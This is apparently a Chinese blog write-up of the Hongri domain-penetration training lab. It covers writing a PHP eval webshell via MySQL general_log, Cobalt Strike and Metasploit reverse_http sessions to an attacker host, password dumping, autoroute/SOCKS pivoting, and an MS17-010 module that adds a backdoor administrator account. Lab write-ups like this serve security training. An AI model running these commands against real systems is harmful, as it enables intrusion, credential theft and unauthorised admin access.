内网域渗透—红日靶场1

0x01、实验环境

红日一靶场

网络拓扑图

image-20220418000211898

实验环境

win7:web服务器
	公网IP:192.168.1.139
	内网IP:192.168.52.143
Win2008:域控
	内网IP:192.168.52.
Win2003:域成员
	内网IP:192.168.52.

0x02、web服务器getshell

扫描端口

image-20220418000945441

发现web服务,访问服务器

image-20220418000756791

在探针中可以尝试数据库检测,发现默认账号密码root没有改变

image-20220418001139656

尝试进入phpmyadmin

image-20220418001210100

使用测出的mysql账号密码登录

image-20220418001450189

尝试在SQL中直接写入webshell

select '<?php eval($_POST[hack]);?>' into outfile 'C:/phpstudy/WWW/hack.php'

image-20220418001705223

失败

发现没有权限写入

image-20220418002011406

尝试通过全局日志写入webshell

image-20220418002350615

开启general_log模式set global general_log = on;

修改存放路径,设置日志目录为shell地址set global general_log_file = 'C:/phpstudy/WWW/hack.php';

image-20220418002656617

再次查询,写入一句话

select '<?php eval($_POST[hack]);?>'

可以在服务器中看到,文件中已经有写入的一句话木马了

image-20220418003040179

拿shell

image-20220418003206250

发现有yxcms,尝试访问

image-20220418003309047

主页直接写有后台地址和账号密码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PesIbBXy-1650358875735)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220418003430555.png)]

进入同样可以拿shell(通过模板)

0x03、提权上线

默认权限很高

image-20220418003948185

杀软检测

image-20220418020128714

CS写马上线

image-20220418004919263

image-20220418004947951

sleep 0

image-20220418005157509

简单信息收集

查看补丁

image-20220418005531242

查看内网

image-20220418005818425

抓密码

image-20220418010112179

联动msf

新建监听器,payload选择foreign HTTP,地址填kali地址,端口自行设置

image-20220418011111455

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.137
set lport 4444 
exploit

image-20220418011204930

对已上线的靶机新建会话,选择msf的监听器

msf成功上线

image-20220418011323921

image-20220418011418083

可直接使用msf内置模块提权为system

image-20220418011521530

0x04、内网渗透

arp -a,查询系统中缓存的ARP表

image-20220418012054443

添加路由

run autoroute -s 192.168.52.0/24
run autoroute -p

image-20220418012215132

探测存活主机

run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

image-20220418012553199

设置代理

use auxiliary/server/socks_proxy
set SRVHOST 192.168.1.137(攻击机IP)
set VERSION 4a
show options
exploit

修改配置文件vim /etc/proxychains4.conf

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ekVDR1HD-1650358875742)(https://gitee.com/aspirin_s/note-picture/raw/master/img/WEB%E6%B8%97%E9%80%8F/image-20220418012934186.png)]

对其他目标信息收集

此后操作记得带上proxychains

proxychains nmap -sT -Pn -T4 192.168.52.141

image-20220418020951325

nmap端口扫描很慢可以使用cs插件获取

image-20220418014249603

利用nmap脚本查看可以利用漏洞

proxychains nmap --script=vuln 192.168.52.141

使用ms17-010的另一种模块

use auxiliary/admin/smb/ms17_010_command
show options
set rhosts 192.168.52.141
set COMMAND net user hack Hack.com /add
exploit
set COMMAND net localgroup administrators hack /add
exploit
set COMMAND net localgroup administrators
exploit

命令成功执行,在141上成功新建用户并加入管理员组

其他内网姿势还在学习中

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值